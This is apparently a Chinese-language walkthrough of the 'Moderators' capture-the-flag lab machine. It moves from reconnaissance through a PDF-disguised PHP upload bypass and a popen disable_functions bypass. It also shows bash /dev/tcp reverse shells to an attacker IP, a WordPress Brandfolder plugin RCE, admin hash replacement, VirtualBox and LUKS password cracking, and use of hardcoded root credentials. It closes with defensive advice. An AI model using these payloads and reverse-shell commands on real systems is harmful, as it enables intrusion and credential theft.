实战打靶之Moderators
字数 1610 2025-08-11 22:57:21

Moderators 靶机实战渗透教学文档

信息收集阶段

端口扫描

使用nmap进行基础扫描:

nmap -sV -p- 目标IP

发现开放端口:

  • 22 (SSH)
  • 80 (HTTP)

Web应用侦察

  1. 初步浏览发现站点为托管服务/漏洞评估提供商
  2. 发现包含主机地址、漏洞类型的测试报告
  3. 报告通过ID参数访问,格式为/report?id=XXXX

目录爆破

使用feroxbuster进行目录枚举:

feroxbuster -u http://目标IP -w /path/to/wordlist.txt

关键发现:

  • /logs目录存在
  • /logs/e21cece511f43a5cb18d4932429915ed/子目录

ID枚举

使用wfuzz对报告ID进行枚举:

wfuzz -c -z range,0000-9999 http://目标IP/report?id=FUZZ

发现6个有效ID,其中3个未知

漏洞利用阶段

文件上传漏洞发现

  1. 通过枚举发现上传接口
  2. 上传参数名为pdfFile
  3. 服务器验证机制:
    • MIME类型(Content-Type)
    • 文件魔术字节(前5字节应为%PDF-)
    • 文件扩展名

文件上传绕过技术

  1. 修改文件名:z.pdf.php
  2. 修改Content-Type:application/pdf
  3. 添加PDF魔术字节:
%PDF-
<?php phpinfo(); ?>

绕过disable_functions

发现大多数命令执行函数被禁用,使用popen函数绕过:

<?php
error_reporting(E_ALL);
$handle = popen('/bin/ls 2>&1', 'r');
echo "'$handle'; " . gettype($handle) . "\n";
$read = fread($handle, 2096);
echo $read;
pclose($handle);
?>

获取初始shell

  1. 使用curl反弹shell:
curl http://目标IP/uploaded_shell.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/攻击者IP/端口+0>%261"
  1. 使用nc监听:
nc -lvnp 端口

内网横向移动

服务发现

  1. 使用netstat发现本地监听服务:
netstat -tulnp
  1. 确认存在WordPress站点运行在localhost

隧道搭建

使用chisel建立SOCKS隧道:

# 攻击机(服务端)
./chisel server -p 8000 --reverse

# 靶机(客户端)
./chisel client 攻击者IP:8000 R:socks

WordPress插件漏洞利用

发现Brandfolder插件漏洞(Exploit-DB):

  1. 使用curl触发RCE:
curl '127.0.0.1:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/dev/shm/&cmd=bash+-c+"bash+-i+>%26+/dev/tcp/攻击者IP/5444+0>%261"'

数据库渗透

  1. 发现密码管理插件pwds-manager.php
  2. 分析数据库结构:
function pms_db_install() {
    global $wpdb;
    $table_name = $wpdb->prefix . 'pms_passwords';
    $sql1 = "CREATE TABLE $table_name (
        pass_id int(11) NOT NULL AUTO_INCREMENT,
        user_name varchar(200) NOT NULL,
        user_email varchar(200) NOT NULL,
        user_password longtext NOT NULL,
        category_id int(11) NOT NULL,
        note text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
        url longtext NOT NULL,
        PRIMARY KEY (pass_id)
    )ENGINE=InnoDB DEFAULT CHARSET=latin1";
    dbDelta($sql1);
}
  1. 数据库查询:
mysql -u wordpressuser -p'wordpresspassword123!!' wordpress
show tables;
select user_name,user_password from wp_pms_passwords;

WordPress管理员密码重置

  1. 使用在线工具生成WordPress密码哈希:
    • 网站:https://www.useotools.com/es/wordpress-password-hash-generator/
  2. 更新数据库:
UPDATE `wp_users` SET `user_pass` = '$P$BqTMH6f2/YJmGLjPetfgm3MnNewMhS1' WHERE user_login = 'admin';

权限提升阶段

VirtualBox虚拟机破解

  1. 发现.vbox虚拟机配置文件
  2. 使用pyvboxdie-cracker工具破解加密:
python cracker.py encrypted.vbox
  1. 获取密码:computer

LUKS磁盘加密破解

  1. 使用bruteforce-luks工具:
./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda
  1. 获取密码:abc123

最终root密码发现

在脚本文件中发现密码:

grep -r pass .

发现于all-in-one/distro_update.sh

passwd='$_THE_best_Sysadmin_Ever_'

获取root权限

sudo -l
su root
密码: $_THE_best_Sysadmin_Ever_

关键知识点总结

  1. 文件上传绕过技术

    • 魔术字节伪造
    • Content-Type修改
    • 双重扩展名利用

  2. PHP disable_functions绕过

    • popen函数利用
    • Chankro工具(https://github.com/TarlogicSecurity/Chankro)

  3. WordPress插件漏洞利用

    • Brandfolder插件RCE
    • 密码管理插件数据库分析

  4. 加密系统破解

    • VirtualBox配置文件破解
    • LUKS磁盘加密爆破

  5. 隧道技术

    • Chisel工具使用
    • SOCKS代理建立

  6. 密码哈希处理

    • WordPress密码哈希生成与替换

  7. 权限提升路径

    • 配置文件密码泄露
    • 脚本文件硬编码凭证

推荐工具列表

  1. 目录枚举:feroxbuster
  2. ID枚举:wfuzz
  3. 隧道工具:chisel
  4. PHP绕过工具:Chankro
  5. VirtualBox破解:pyvboxdie-cracker
  6. LUKS爆破:bruteforce-luks
  7. WordPress哈希生成:useotools.com

防御建议

  1. 文件上传:

    • 使用白名单验证
    • 服务器端MIME检测
    • 文件内容严格验证

  2. PHP安全:

    • 限制危险函数
    • 定期更新PHP版本

  3. WordPress安全:

    • 及时更新插件
    • 删除不必要插件
    • 使用强密码

  4. 系统安全:

    • 避免硬编码凭证
    • 使用强加密密码
    • 限制sudo权限
Moderators 靶机实战渗透教学文档 信息收集阶段 端口扫描 使用nmap进行基础扫描: 发现开放端口: 22 (SSH) 80 (HTTP) Web应用侦察 初步浏览发现站点为托管服务/漏洞评估提供商 发现包含主机地址、漏洞类型的测试报告 报告通过ID参数访问,格式为 /report?id=XXXX 目录爆破 使用feroxbuster进行目录枚举: 关键发现: /logs 目录存在 /logs/e21cece511f43a5cb18d4932429915ed/ 子目录 ID枚举 使用wfuzz对报告ID进行枚举: 发现6个有效ID,其中3个未知 漏洞利用阶段 文件上传漏洞发现 通过枚举发现上传接口 上传参数名为 pdfFile 服务器验证机制: MIME类型(Content-Type) 文件魔术字节(前5字节应为 %PDF- ) 文件扩展名 文件上传绕过技术 修改文件名: z.pdf.php 修改Content-Type: application/pdf 添加PDF魔术字节: 绕过disable_ functions 发现大多数命令执行函数被禁用,使用popen函数绕过: 获取初始shell 使用curl反弹shell: 使用nc监听: 内网横向移动 服务发现 使用netstat发现本地监听服务: 确认存在WordPress站点运行在localhost 隧道搭建 使用chisel建立SOCKS隧道: WordPress插件漏洞利用 发现Brandfolder插件漏洞(Exploit-DB): 使用curl触发RCE: 数据库渗透 发现密码管理插件 pwds-manager.php 分析数据库结构: 数据库查询: WordPress管理员密码重置 使用在线工具生成WordPress密码哈希: 网站:https://www.useotools.com/es/wordpress-password-hash-generator/ 更新数据库: 权限提升阶段 VirtualBox虚拟机破解 发现.vbox虚拟机配置文件 使用pyvboxdie-cracker工具破解加密: 获取密码: computer LUKS磁盘加密破解 使用bruteforce-luks工具: 获取密码: abc123 最终root密码发现 在脚本文件中发现密码: 发现于 all-in-one/distro_update.sh : 获取root权限 关键知识点总结 文件上传绕过技术 : 魔术字节伪造 Content-Type修改 双重扩展名利用 PHP disable_ functions绕过 : popen函数利用 Chankro工具(https://github.com/TarlogicSecurity/Chankro) WordPress插件漏洞利用 : Brandfolder插件RCE 密码管理插件数据库分析 加密系统破解 : VirtualBox配置文件破解 LUKS磁盘加密爆破 隧道技术 : Chisel工具使用 SOCKS代理建立 密码哈希处理 : WordPress密码哈希生成与替换 权限提升路径 : 配置文件密码泄露 脚本文件硬编码凭证 推荐工具列表 目录枚举:feroxbuster ID枚举:wfuzz 隧道工具:chisel PHP绕过工具:Chankro VirtualBox破解:pyvboxdie-cracker LUKS爆破:bruteforce-luks WordPress哈希生成:useotools.com 防御建议 文件上传: 使用白名单验证 服务器端MIME检测 文件内容严格验证 PHP安全: 限制危险函数 定期更新PHP版本 WordPress安全: 及时更新插件 删除不必要插件 使用强密码 系统安全: 避免硬编码凭证 使用强加密密码 限制sudo权限